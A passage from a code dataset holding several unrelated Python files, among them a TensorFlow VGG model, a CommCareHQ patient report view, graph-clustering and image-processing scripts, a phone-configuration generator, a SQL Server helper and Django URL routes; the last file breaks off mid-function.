activation=tf.nn.relu,\n strides=1)\n conv1_2 = tf.layers.conv2d(\n inputs=conv1_1,\n filters=64,\n kernel_size=3,\n activation=tf.nn.relu,\n strides=1)\n pool1 = tf.layers.max_pooling2d(\n inputs=conv1_2,\n pool_size=2,\n strides=2)\n\n conv2_1 = tf.layers.conv2d( \n inputs=pool1,\n filters=128,\n activation=tf.nn.relu,\n kernel_size=3)\n conv2_2 = tf.layers.conv2d(\n inputs=conv2_1,\n filters=128,\n activation=tf.nn.relu,\n kernel_size=3)\n pool2 = tf.layers.max_pooling2d(\n inputs=conv2_2,\n pool_size=2,\n strides=2)\n\n conv3_1 = tf.layers.conv2d(\n inputs=pool2,\n filters=256,\n activation=tf.nn.relu,\n kernel_size=3)\n conv3_2 = tf.layers.conv2d(\n inputs=conv3_1, \n filters=256,\n activation=tf.nn.relu,\n kernel_size=3)\n pool3 = tf.layers.max_pooling2d(\n inputs=conv3_2,\n pool_size=2,\n strides=2)\n\n conv4_1 = tf.layers.conv2d(\n inputs=pool3,\n filters=512,\n activation=tf.nn.relu,\n kernel_size=3)\n conv4_2 = tf.layers.conv2d(\n inputs=conv4_1,\n filters=512,\n activation=tf.nn.relu,\n kernel_size=3)\n pool4 = tf.layers.max_pooling2d(\n inputs=conv4_2,\n pool_size=2,\n strides=2)\n\n conv5_1 = tf.layers.conv2d(\n 
inputs=pool4,\n filters=512,\n activation=tf.nn.relu,\n kernel_size=3)\n conv5_2 = tf.layers.conv2d(\n inputs=conv5_1,\n filters=512,\n activation=tf.nn.relu,\n kernel_size=3)\n pool5 = tf.layers.max_pooling2d(\n inputs=conv5_2,\n pool_size=2,\n strides=2)\n\n\n shp = pool5.get_shape().as_list() # pool2 if shrunk\n flattened_shape = shp[1] * shp[2] * shp[3]\n resh1 = tf.reshape(pool5, [shp[0], flattened_shape], name=\"resh1\")\n\n # Fully connected layers with dropout.\n fc6 = tf.layers.dense(\n inputs=resh1,\n units=4096,\n activation=tf.nn.relu)\n drp6 = tf.layers.dropout(\n inputs=fc6,\n rate=(1-FLAGS.dropout_keep_prob))\n fc7 = tf.layers.dense(\n inputs=drp6,\n units=4096,\n activation=tf.nn.relu)\n drp7 = tf.layers.dropout(\n inputs=fc7,\n rate=(1-FLAGS.dropout_keep_prob))\n fc8 = tf.layers.dense(\n inputs=drp7,\n units=FLAGS.num_classes)\n\n\n # Calculating the loss.\n loss = tf.losses.softmax_cross_entropy(\n onehot_labels=labels, logits=fc8)\n\n # Configuring the optimization algorithm.\n learning_rate = tf.train.exponential_decay(\n FLAGS.learning_rate, tf.train.get_global_step(), 25000, 0.97)\n if FLAGS.use_tpu:\n optimizer = tpu_optimizer.CrossShardOptimizer(\n tf.train.GradientDescentOptimizer(learning_rate=learning_rate))\n else:\n optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)\n\n train_op = optimizer.minimize(loss, global_step=tf.train.get_global_step())\n return tpu_estimator.TPUEstimatorSpec(mode=mode, loss=loss, train_op=train_op)\n\n \n\ndef main(unused_argv):\n assert len(unused_argv) == 1, (\n \"Unrecognized command line arguments: %s\" % unused_argv[1:])\n\n start = time.time()\n tf.logging.set_verbosity(tf.logging.INFO)\n\n run_config = tpu_config.RunConfig(\n master=FLAGS.master,\n model_dir=FLAGS.model_dir,\n save_checkpoints_secs=FLAGS.save_checkpoints_secs,\n session_config=tf.ConfigProto(\n allow_soft_placement=True, log_device_placement=True),\n #tpu_config=tpu_config.TPUConfig(5, FLAGS.num_shards, per_host_input_for_training = True),\n tpu_config=tpu_config.TPUConfig(FLAGS.iterations, FLAGS.num_shards),\n )\n estimator = tpu_estimator.TPUEstimator(\n model_fn=model_fn,\n use_tpu=FLAGS.use_tpu,\n train_batch_size=FLAGS.batch_size,\n config=run_config)\n estimator.train(input_fn=input_fn, max_steps=FLAGS.train_steps)\n total = time.time() - start\n print(\"Total time: \" + str(total))\n\nif __name__ == \"__main__\":\n tf.app.run()\n","sub_path":"fathom_tpu/vgg/vgg.py","file_name":"vgg.py","file_ext":"py","file_size_in_byte":4579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"420119976","text":"from datetime import datetime, timedelta\nfrom couchdbkit.exceptions import ResourceNotFound\nfrom django.core.urlresolvers import reverse\nfrom django.http.response import Http404\nfrom django.utils import html\nfrom corehq.apps.api.es import ReportXFormES\nfrom corehq.apps.app_manager.models import ApplicationBase\nfrom corehq.apps.cloudcare.api import get_cloudcare_app, get_cloudcare_form_url\nfrom corehq.apps.reports.datatables import DataTablesHeader, DataTablesColumn\nfrom corehq.apps.reports.filters.search import SearchFilter\nfrom corehq.apps.reports.generic import ElasticProjectInspectionReport\nfrom corehq.apps.reports.standard import CustomProjectReport, ProjectReportParametersMixin\nfrom casexml.apps.case.models import CommCareCase\nfrom corehq.apps.users.models import CouchUser, CommCareUser\nfrom custom.succeed.reports import DrilldownReportMixin, VISIT_SCHEDULE, 
CM_APP_PD_MODULE, CM_APP_HUD_MODULE, CM_APP_CM_MODULE, CM_APP_CHW_MODULE, \\\n EMPTY_FIELD, OUTPUT_DATE_FORMAT, INPUT_DATE_FORMAT, PM2, PM_APP_PM_MODULE, CHW_APP_MA_MODULE, CHW_APP_PD_MODULE, SUBMISSION_SELECT_FIELDS, MEDICATION_DETAILS, INTERACTION_OUTPUT_DATE_FORMAT, CM_APP_MEDICATIONS_MODULE, PD2AM, PD2BPM, PD2CHM, PD2DIABM, PD2DEPM, PD2SCM, PD2OM, CM_APP_APPOINTMENTS_MODULE, AP2\nfrom custom.succeed.reports import PD1, PD2, PM3, PM4, HUD2, CM6, CHW3\nfrom custom.succeed.reports.patient_Info import PatientInfoDisplay\nfrom custom.succeed.utils import SUCCEED_CM_APPNAME, is_pm_or_pi, is_cm, is_pi, SUCCEED_PM_APPNAME, SUCCEED_CHW_APPNAME, is_chw, SUCCEED_DOMAIN\nfrom dimagi.utils.decorators.memoized import memoized\n\nclass PatientInfoReport(CustomProjectReport, DrilldownReportMixin, ElasticProjectInspectionReport, ProjectReportParametersMixin):\n slug = \"patient\"\n\n hide_filters = True\n filters = []\n ajax_pagination = True\n asynchronous = True\n emailable = False\n xform_es = ReportXFormES(SUCCEED_DOMAIN)\n\n default_sort = {\n \"received_on\": \"desc\"\n }\n\n def __init__(self, request, base_context=None, domain=None, **kwargs):\n self.view_mode = request.GET.get('view', 'info')\n super(PatientInfoReport, self).__init__(request, base_context, domain, **kwargs)\n\n @property\n def fields(self):\n if self.view_mode == 'submissions' and self.submission_user_access:\n return ['custom.succeed.fields.PatientFormNameFilter',\n 'corehq.apps.reports.standard.cases.filters.CaseSearchFilter']\n else:\n return []\n\n @property\n def base_template_filters(self):\n if self.view_mode == 'submissions' and self.submission_user_access:\n return 'succeed/report.html'\n else:\n return super(PatientInfoReport, self).base_template_filters\n\n @property\n def name(self):\n if self.view_mode == 'submissions':\n return \"Patient Submissions\"\n if self.view_mode == 'status':\n return 'Manage Patient Status'\n return \"Patient Info\"\n\n def get_case(self):\n if self.request.GET.get('patient_id', None) is None:\n return None\n return CommCareCase.get(self.request.GET['patient_id'])\n\n @property\n def submission_user_access(self):\n user = self.request.couch_user\n if user and (is_pi(user) or is_cm(user) or is_chw(user)):\n return True\n return False\n\n @property\n def patient_status_access(self):\n user = self.request.couch_user\n if user and is_pm_or_pi(user):\n return True\n return False\n\n @property\n def report_context(self):\n ret = {}\n\n try:\n case = self.get_case()\n has_error = False\n except ResourceNotFound:\n\n has_error = True\n case = None\n if case is None:\n self.report_template_path = \"patient_error.html\"\n if has_error:\n ret['error_message'] = \"Patient not found\"\n else:\n ret['error_message'] = \"No patient selected\"\n return ret\n\n\n def get_form_url(app_dict, app_build_id, module_idx, form, case_id=None):\n try:\n module = app_dict['modules'][module_idx]\n form_idx = [ix for (ix, f) in enumerate(module['forms']) if f['xmlns'] == form][0]\n except IndexError:\n form_idx = None\n\n return html.escape(get_cloudcare_form_url(domain=self.domain,\n app_build_id=app_build_id,\n module_id=module_idx,\n form_id=form_idx,\n case_id=case_id))\n\n\n try:\n cm_app_dict = get_cloudcare_app(case['domain'], SUCCEED_CM_APPNAME)\n latest_cm_build = ApplicationBase.get_latest_build(case['domain'], cm_app_dict['_id'])['_id']\n pm_app_dict = get_cloudcare_app(case['domain'], SUCCEED_PM_APPNAME)\n latest_pm_build = ApplicationBase.get_latest_build(case['domain'], pm_app_dict['_id'])['_id']\n 
chw_app_dict = get_cloudcare_app(case['domain'], SUCCEED_CHW_APPNAME)\n latest_chw_build = ApplicationBase.get_latest_build(case['domain'], chw_app_dict['_id'])['_id']\n except ResourceNotFound as ex:\n self.report_template_path = \"patient_error.html\"\n ret['error_message'] = ex.message\n return ret\n\n ret['patient'] = case\n ret['root_url'] = '?patient_id=%s' % case['_id']\n ret['view_mode'] = self.view_mode\n ret['patient_status_access'] = self.patient_status_access\n ret['submission_user_access'] = self.submission_user_access\n\n if self.view_mode == 'info':\n self.report_template_path = \"patient_info.html\"\n patient_info = PatientInfoDisplay(case)\n\n # check user role:\n user = self.request.couch_user\n if is_pm_or_pi(user):\n ret['edit_patient_info_url'] = get_form_url(pm_app_dict, latest_pm_build, PM_APP_PM_MODULE, PM2)\n elif is_cm(user):\n ret['edit_patient_info_url'] = get_form_url(cm_app_dict, latest_cm_build, CM_APP_PD_MODULE, PM2)\n elif is_chw(user):\n ret['edit_patient_info_url'] = get_form_url(chw_app_dict, latest_chw_build, CHW_APP_PD_MODULE, PM2)\n\n if is_pm_or_pi(user):\n ret['upcoming_appointments_url'] = get_form_url(pm_app_dict, latest_pm_build, PM_APP_PM_MODULE, PM2)\n elif is_cm(user):\n ret['upcoming_appointments_url'] = get_form_url(cm_app_dict, latest_cm_build, CM_APP_PD_MODULE, PM2)\n elif is_chw(user):\n ret['upcoming_appointments_url'] = get_form_url(chw_app_dict, latest_chw_build, CHW_APP_MA_MODULE, PM2)\n\n ret['general_information'] = patient_info.general_information\n ret['contact_information'] = patient_info.contact_information\n ret['most_recent_lab_exams'] = patient_info.most_recent_lab_exams\n ret['allergies'] = patient_info.allergies\n\n elif self.view_mode == 'submissions':\n if self.submission_user_access:\n tabular_context = super(PatientInfoReport, self).report_context\n tabular_context.update(ret)\n self.report_template_path = \"patient_submissions.html\"\n tabular_context['patient_id'] = self.request_params['patient_id']\n\n return tabular_context\n else:\n self.report_template_path = \"patient_error.html\"\n ret['error_message'] = \"Cannot access report (incorrect user role)\"\n return ret\n elif self.view_mode == 'interactions':\n self.report_template_path = \"patient_interactions.html\"\n ret['problem_url'] = get_form_url(cm_app_dict, latest_cm_build, CM_APP_PD_MODULE, PD1)\n ret['huddle_url'] = get_form_url(cm_app_dict, latest_cm_build, CM_APP_HUD_MODULE, HUD2)\n ret['cm_phone_url'] = get_form_url(cm_app_dict, latest_cm_build, CM_APP_CM_MODULE, CM6)\n ret['chw_phone_url'] = get_form_url(cm_app_dict, latest_cm_build, CM_APP_CHW_MODULE, CHW3)\n ret['cm_visits_url'] = get_form_url(cm_app_dict, latest_cm_build, CM_APP_APPOINTMENTS_MODULE, AP2)\n\n ret['anti_thrombotic_url'] = get_form_url(cm_app_dict, latest_cm_build, CM_APP_MEDICATIONS_MODULE, PD2AM)\n ret['blood_pressure_url'] = get_form_url(cm_app_dict, latest_cm_build, CM_APP_MEDICATIONS_MODULE, PD2BPM)\n ret['cholesterol_url'] = get_form_url(cm_app_dict, latest_cm_build, CM_APP_MEDICATIONS_MODULE, PD2CHM)\n ret['depression_url'] = get_form_url(cm_app_dict, latest_cm_build, CM_APP_MEDICATIONS_MODULE, PD2DEPM)\n ret['diabetes_url'] = get_form_url(cm_app_dict, latest_cm_build, CM_APP_MEDICATIONS_MODULE, PD2DIABM)\n ret['smoking_cessation_url'] = get_form_url(cm_app_dict, latest_cm_build, CM_APP_MEDICATIONS_MODULE, PD2SCM)\n ret['other_meds_url'] = get_form_url(cm_app_dict, latest_cm_build, CM_APP_MEDICATIONS_MODULE, PD2OM)\n\n ret['interaction_table'] = []\n for visit_key, visit in 
enumerate(VISIT_SCHEDULE):\n if case[\"randomization_date\"]:\n target_date = (case[\"randomization_date\"] + timedelta(days=visit['days'])).strftime(OUTPUT_DATE_FORMAT)\n else:\n target_date = EMPTY_FIELD\n interaction = {\n 'url': '',\n 'name': visit['visit_name'],\n 'target_date': target_date,\n 'received_date': EMPTY_FIELD,\n 'completed_by': EMPTY_FIELD,\n 'scheduled_date': EMPTY_FIELD\n }\n for key, action in enumerate(case['actions']):\n if visit['xmlns'] == action['xform_xmlns']:\n interaction['received_date'] = action['date'].strftime(INTERACTION_OUTPUT_DATE_FORMAT)\n try:\n user = CouchUser.get(action['user_id'])\n interaction['completed_by'] = user.raw_username\n except ResourceNotFound:\n interaction['completed_by'] = EMPTY_FIELD\n del case['actions'][key]\n break\n if visit['show_button']:\n interaction['url'] = get_form_url(cm_app_dict, latest_cm_build, visit['module_idx'], visit['xmlns'])\n if 'scheduled_source' in visit and case.get_case_property(visit['scheduled_source']):\n interaction['scheduled_date'] = (case.get_case_property(visit['scheduled_source'])).strftime(INTERACTION_OUTPUT_DATE_FORMAT)\n\n ret['interaction_table'].append(interaction)\n\n medication = []\n for med_prop in MEDICATION_DETAILS:\n medication.append(getattr(case, med_prop, EMPTY_FIELD))\n ret['medication_table'] = medication\n\n elif self.view_mode == 'plan':\n self.report_template_path = \"patient_plan.html\"\n elif self.view_mode == 'status':\n if self.patient_status_access:\n self.report_template_path = \"patient_status.html\"\n ret['disenroll_patient_url'] = get_form_url(pm_app_dict, latest_pm_build, PM_APP_PM_MODULE, PM3)\n ret['change_patient_data_url'] = get_form_url(pm_app_dict, latest_pm_build, PM_APP_PM_MODULE, PM4)\n else:\n self.report_template_path = \"patient_error.html\"\n ret['error_message'] = \"Only PMs can disenroll participants\"\n return ret\n else:\n raise Http404\n return ret\n\n def submit_history_form_link(self, form_id, form_name):\n url = reverse('render_form_data', args=[self.domain, form_id])\n return html.mark_safe(\"<a href='%s'>%s</a>\" % (url, html.escape(form_name)))\n\n @memoized\n def form_submitted_by(self, user_id):\n try:\n user = CommCareUser.get(user_id)\n return user.human_friendly_name\n except ResourceNotFound:\n return \"%s (User Not Found)\" % user_id\n\n def form_completion_time(self, date_string):\n if date_string != EMPTY_FIELD:\n date = datetime.strptime(date_string, \"%Y-%m-%dT%H:%M:%SZ\")\n return date.strftime(\"%m/%d/%Y %H:%M\")\n else:\n return EMPTY_FIELD\n\n @property\n def headers(self):\n return DataTablesHeader(\n DataTablesColumn(\"Form Name\", sortable=False, span=1),\n DataTablesColumn(\"Submitted By\", sortable=False, span=1),\n DataTablesColumn(\"Completed\", sortable=False, span=1)\n )\n\n @property\n def es_results(self):\n if 'patient_id' not in self.request.GET:\n return None\n\n full_query = {\n 'query': {\n \"filtered\": {\n \"filter\": {\n \"and\": [\n {\"term\": {\"domain.exact\": self.request.domain}},\n {\"term\": {\"doc_type\": \"xforminstance\"}},\n {\n \"nested\": {\n \"path\": \"form.case\",\n \"filter\": {\n \"or\": [\n {\n \"term\": {\n \"@case_id\": \"%s\" % self.request.GET[\n 'patient_id']\n }\n },\n {\n \"term\": {\n \"case_id\": \"%s\" % self.request.GET['patient_id']\n }\n }\n ]\n }\n }\n }\n ]\n },\n \"query\": {\"match_all\": {}}\n }\n },\n \"sort\": self.get_sorting_block(),\n \"size\": self.pagination.count,\n \"from\": self.pagination.start\n }\n\n form_name_group = self.request.GET.get('form_name_group', None)\n 
form_name_xmlns = self.request.GET.get('form_name_xmlns', None)\n search_string = SearchFilter.get_value(self.request, self.domain)\n\n if search_string:\n query_block = {\"queryString\": {\"query\": \"*\" + search_string + \"*\"}}\n full_query[\"query\"][\"filtered\"][\"query\"] = query_block\n\n if form_name_group and form_name_xmlns == '':\n xmlns_terms = []\n forms = filter(lambda obj: obj['val'] == form_name_group, SUBMISSION_SELECT_FIELDS)[0]\n for form in forms['next']:\n xmlns_terms.append(form['val'])\n\n full_query['query']['filtered']['filter']['and'].append({\"terms\": {\"xmlns.exact\": xmlns_terms}})\n\n if form_name_xmlns:\n full_query['query']['filtered']['filter']['and'].append({\"term\": {\"xmlns.exact\": form_name_xmlns}})\n\n res = self.xform_es.run_query(full_query)\n return res\n\n @property\n def rows(self):\n if 'patient_id' in self.request.GET:\n def _format_row(row_field_dict):\n return [self.submit_history_form_link(row_field_dict[\"_id\"],\n row_field_dict['_source'].get('es_readable_name', EMPTY_FIELD)),\n self.form_submitted_by(row_field_dict['_source']['form']['meta'].get('userID', EMPTY_FIELD)),\n self.form_completion_time(row_field_dict['_source']['form']['meta'].get('timeEnd', EMPTY_FIELD))\n ]\n\n res = self.es_results\n if res:\n if 'error' in res:\n pass\n else:\n for result in res['hits']['hits']:\n yield list(_format_row(result))\n","sub_path":"custom/succeed/reports/patient_details.py","file_name":"patient_details.py","file_ext":"py","file_size_in_byte":16437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"127850822","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[23]:\n\n\nfrom collections import Counter\nimport matplotlib.pyplot as plt\nimport networkx as nx\nimport sys\nimport time\nfrom TwitterAPI import TwitterAPI\nfrom nltk.tokenize import word_tokenize\nimport pandas as pd\nimport networkx as networkx\nimport numpy as np\n\n\n# In[24]:\n\n\ndef create_graph(quor = 0):\n data_list = []\n edges_l = []\n csv_list = ['USA-cluster.csv','UK-cluster.csv','India-cluster.csv']\n for csv in csv_list:\n data_list.append(csv)\n graph=nx.Graph()\n for file in data_list:\n frame=pd.read_csv(file,sep='\\t')\n for index,row in frame.iterrows():\n l_friends=list(row['friends'].split(','))\n for ls in l_friends:\n edges_point = (row['Id'],ls)\n edges_l.append(edges_point)\n graph = graph_made(edges_l)\n return graph\n\n\n# In[25]:\n\n\ndef graph_made(edges_l):\n graph=nx.Graph()\n graph.add_edges_from(edges_l)\n nx.draw(graph)\n #nx.draw_networkx(graph)\n plt.figure(figsize=(100,100))\n plt.savefig(\"cluster.png\", format = \"PNG\")\n n=str(nx.nodes(graph))\n return graph\n\n\n# In[26]:\n\n\ndef girvan_newman_cluster(depth=0, min_nodes = 10, max_nodes =800, max_n = 0, index = 0):\n \n graph=create_graph()\n if graph.order() == 1:\n return [graph.nodes()]\n com_result=[]\n file_nam = \"cluster.txt\"\n file1=open(file_nam,\"w+\")\n\n component = get_components(graph)\n \n length_comp = len(component)\n if(length_comp>1):\n for ids,eg in enumerate(component):\n length_eg_node = len(eg.nodes())\n if max_n
benchmark_price) * -0.01\n # cont_portion = portion * 0.005\n portion_next = portion * decay_rate + cont_price #+ np.random.rand()*1e-1# + cont_portion\n \n if portion_next > portion_celing :\n portion_next = portion_celing + 1e-5 * np.random.rand()\n if portion_next < portion_floor :\n portion_next = portion_floor + 1e-5 * np.random.rand()\n \n if portion_next < 0.15 or price_next < 60:\n done = True\n else :\n done = False\n \n if done :\n reward = -100\n else :\n reward = price_next * w1 + portion * w2\n self.state = np.array([price_next, portion_next]).reshape(-1,)\n return self.state, reward, done, {}\n \n ","sub_path":"my_env/market.py","file_name":"market.py","file_ext":"py","file_size_in_byte":2665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"149879273","text":"from PIL import Image\nimport sys\nimport os\n\nchair_folders = open(\"data/chair_folders.txt\", \"r\")\nfolder_count = 0\nRES = 64\n\nos.mkdir(str(RES) + \"_images/\")\nfor folder in chair_folders:\n folder_count += 1\n print(\"folder: \", folder_count)\n\n os.mkdir(str(RES) + \"_images/\" + folder.rstrip('\\n'))\n for i in range(20):\n img = Image.open(\"data/shapenet_release/renders/03001627/\" + folder.rstrip('\\n') + \"/render_\" + str(i) + \".png\")\n img = img.resize((RES, RES), Image.ANTIALIAS)\n img.save(str(RES) + \"_images/\" + folder.rstrip('\\n') + \"/render_\" + str(i) + \"_\" + str(RES) + \".png\")\n","sub_path":"resize_images.py","file_name":"resize_images.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"19547086","text":"#!/usr/bin/python\n\nimport string\nimport random\nimport re\n\nsccp = open('sccp.conf', 'w')\nsccpsimple = open('sccp.conf.simple', 'w')\nsccpdial = open('sccp.dialplan', 'w')\n\ndef randomMAC():\n mac = [ 0x00, 0x16, 0x3e,\n random.randint(0x00, 0x7f),\n random.randint(0x00, 0xff),\n random.randint(0x00, 0xff) ]\n return ''.join(map(lambda x: \"%02X\" % x, mac))\n\nline_instance = 1000\ncount = 0\n\nsccp.write('[lines]\\n')\nwhile (count < 500):\n sccp.write('[' + str(line_instance) + ']\\n')\n sccp.write('cid_num=' + str(line_instance) + '\\n')\n sccp.write('cid_name=' + ''.join(random.choice(string.ascii_lowercase) for _ in xrange(5)) + '\\n')\n sccp.write('language=fr_CA\\n')\n sccp.write('\\n')\n\n line_instance += 1\n count += 1 \n\n\nline_instance = 1000\ncount = 0\n\nsccpdial.write('[xivo-extrafeatures]\\n')\nsccpdial.write('[default]\\n')\n\nsccp.write('[devices]\\n')\nwhile (count < 500):\n mac = str(randomMAC())\n sccp.write('[SEP' + mac + ']\\n')\n sccp.write('devices=' + str(mac) + '\\n')\n sccp.write('line=' + str(line_instance) + '\\n')\n sccp.write('\\n')\n\n sccpsimple.write('SEP' + mac + ',' + str(line_instance) + '\\n')\n\n sccpdial.write('exten => ' + str(line_instance) + ',1,Dial(SCCP/' + str(line_instance) + ')\\n');\n# sccpws.write('skaro-dev, f, l, fr_FR, ' + str(line_instance) + ', default, sccp, 0, 0, 0, ' + ':'.join(re.findall('..',mac)) + '\\n');\n\n line_instance += 1\n count += 1\n","sub_path":"gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"629342967","text":"import utils_img as ji\nfrom PIL import Image # Modulo basico de cargar imagenes\n#from scipy.ndimage import sobel, generic_gradient_magnitude\nfrom scipy import ndimage as ndi\nfrom numpy.lib.stride_tricks import 
as_strided\nfrom scipy import sparse\nfrom pathlib import Path # For file paths\nfrom skimage.segmentation import slic, find_boundaries # SLIC superpixel algorithm\nimport numpy as np # Arrays module\nfrom skimage.future import graph\nfrom skimage import io, filters, color\nfrom skimage.feature import canny\n\n\nimport time\n\n\ninicio_de_tiempo = time.time()\n\n\n\n\ndirectorio = Path(\"C:/Users/Juan Ignacio/Documents/Movistar Cloud/TFM/img_muestra_y_destino/\")\nimagen1 = \"prueba_slic_100_pequena.tif\"\nruta1 = directorio / imagen1\n\nnumSegments= 1000 # 1 / 64\ncompactness= 0.1\n#sigma= 5 If not specified it autoadjusts\nconvert2lab= False\n\n#array= io.imread(ruta1)\narray = ji.read_tiff(ruta1,1)\n#array = np.transpose(array, (1, 0, 2))\nprint(array.shape)\nprint('Obtaining superstructures')\nsegments = slic(array,compactness=compactness, n_segments = numSegments, multichannel= False, convert2lab= convert2lab)\nprint('Number of SV: ', len(np.unique(segments)))\nsegments += 1\narray = array.astype('int64')\nmag = ndi.generic_gradient_magnitude(array, ndi.sobel, float)\nmag *= 255.0 / np.max(mag) # normalize (Q&D)\n\n\nprint('Obtaining RAG')\nrag = graph.rag_boundary(segments,mag,connectivity=1 )\nprint('Merging RAG segments')\nsegments2 = graph.merge_hierarchical(segments, rag,253,\n in_place_merge=True,\n rag_copy= False,\n merge_func=ji.merge_boundary,\n weight_func=ji.weight_boundary)\nprint('Final Number of SV: ', len(np.unique(segments2)))\n\n# 110\n#graph.show_rag(segments, rag, array, edge_cmap= 'viridis')\ndestino_guardar= Path('C:/Users/Juan Ignacio/Documents/Movistar Cloud/TFM/Prueba_Feima_multiframe')\n#nombre= 'prueba2D.tif'\nruta_guardado= destino_guardar\nji.save_imagen(array, segments2,ruta_guardado)\ntiempo_final = time.time() \ntiempo_transcurrido = tiempo_final - inicio_de_tiempo\nprint(tiempo_transcurrido)\n\n'''\narray = array.astype('uint8')\nbordes2d= find_boundaries(segments2, connectivity= 1, mode='thick')\narray[bordes2d]= 177\nimagen= Image.fromarray(array)\ndestino_guardar= Path('C:/Users/Juan Ignacio/Documents/Movistar Cloud/TFM/img_muestra_y_destino')\nnombre= 'prueba2D.tif'\nruta_guardado= destino_guardar / nombre\nimagen.save(ruta_guardado)\n'''","sub_path":"prueba2.py","file_name":"prueba2.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"626761017","text":"'''\nTested:\n Python 3.3.0\n Microsoft SQL Server 2008\n'''\n\nimport time\nimport random\nimport adodbapi\nimport threading\n\n'''\n Simple timer class\n'''\nclass Timer(threading.Thread):\n def __init__(self,fn,args=(),sleep = 0):\n threading.Thread.__init__(self)\n self.fn = fn\n self.args = args\n self.interval = sleep\n self.setDaemon(True)\n self.enable = True\n self.running = False\n\n def __do(self):\n self.running = True\n self.fn(*self.args)\n self.running = False\n\n def run(self):\n while self.enable :\n time.sleep(self.interval)\n self.__do()\n\n def stop(self):\n #stop the loop\n self.enable = False\n while True:\n if not self.running : break\n time.sleep(0.01)\n\n'''\n Simple database access helper class\n'''\nclass DbHelper:\n def __init__(self,conn):\n self.conn = conn\n try:\n self.connect = adodbapi.connect(conn,120)\n self.cursor = self.connect.cursor()\n except EnvironmentError as err:\n print('connection failure: ' + str(err))\n\n def getConn(self):\n return self.conn\n\n def getDbTime(self):\n self.cursor.execute(\"select getdate()\")\n daterow = self.cursor.fetchone()\n return str(daterow[0])\n\n def 
execNoResult(self,sql):\n self.cursor.execute(sql)\n self.connect.commit()\n\n def getExecResult(self,sql):\n self.cursor.execute(sql)\n return self.cursor.fetchall()\n\n def closeConn(self):\n try:\n self.cursor.close()\n self.connect.commit()\n self.connect.close()\n except EnvironmentError as err:\n print('close connection failure: ' + str(err))\n\n# def getConnection():\n# dbprov = 'SQLOLEDB' # ADO can use OLE\n# dbserv = '192.168.1.118,1433'\n# dbuser = 'sa'\n# dbpwd = 'pwd'\n# dbname = 'water'\n# return 'Provider=%s;Data Source=%s;Initial Catalog=%s;User ID=%s;Password=%s;' % (dbprov, dbserv, dbname, dbuser, dbpwd )\n#\n# def updateRawData():\n# dbClass = DbHelper(getConnection());\n#\n# try:\n# for row in dbClass.getExecResult(\"select * from rawdata\"):\n# dbClass.execNoResult(\"update rawdata set value='{0}',proc_date=getdate() where pos='{1}'\".format( \"%.2f\" % random.uniform(0,20),row[0]));\n# print(\"update success->\" + dbClass.getDbTime());\n# dbClass.closeConn();\n# except EnvironmentError as err:\n# print('connection failure:' + err);\n#\n# Timer(updateRawData,sleep=5).run()","sub_path":"class/operMsSql.py","file_name":"operMsSql.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"415209888","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n# author:caozy time:19-1-6\nfrom django.conf.urls import url\n\nfrom . import views\nfrom rest_framework_jwt.views import obtain_jwt_token\n\nurlpatterns = [\n url(r'^usernames/(?P<username>\\w{5,20})/count/$',views.RegisterUsernameCountView.as_view(),name='usernames'),# username availability check\n url(r'^phones/(?P<mobile>[1][3,4,5,7,8][0-9]{9})/count/$',views.RegisterMobileCountView.as_view(),name='mobiles'),# mobile number availability check\n url(r'^$',views.RegisterView.as_view(),name='register'),# registration\n # url(r'^auths/$', obtain_jwt_token,name='auths'),\n url(r'^auths/$', views.UserAuthorizationView.as_view(),name='auths'),\n url(r'^infos/$',views.UserCenterInfoView.as_view(),name='infos'),\n url(r'^emails/$',views.UserEmailInfoView.as_view(),name='emails'),\n url(r'^emails/verification/$',views.UserEmailVerifyView.as_view(),name='verify'),\n url(r'^browerhistories/$', views.UserBrowsingHistoryView.as_view(), name='history'),\n\n]\n\n# app_name='users'\nfrom rest_framework.routers import DefaultRouter\nrouter=DefaultRouter()\nrouter.register(r'addresses',views.AddressViewSet,base_name='address')\n# router.register(r'addresses/title',views.AddressViewSet,base_name='title')\n\nurlpatterns+=router.urls\n","sub_path":"mall/apps/users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"276098892","text":"import tensorflow as tf\nfrom configuration import EPOCHS, CHANNELS, BATCH_SIZE, NUM_CLASSES, IMAGE_HEIGHT, IMAGE_WIDTH\nimport math\n\n\ndef _parse_image_function(example_proto):\n # Parse the input tf.Example proto.\n return tf.io.parse_single_example(example_proto, {\n 'label': tf.io.FixedLenFeature([], tf.dtypes.int64),\n 'image': tf.io.FixedLenFeature([], tf.dtypes.string),\n })\n\n\ndef process_features(features, data_augmentation):\n image_raw = features['image'].numpy()\n image_tensor_list = []\n for image in image_raw:\n image_tensor = load_and_preprocess_image(image, data_augmentation=data_augmentation)\n image_tensor_list.append(image_tensor)\n images = tf.stack(image_tensor_list, axis=0)\n labels = features['label'].numpy()\n\n return images, labels\n\n\ndef 
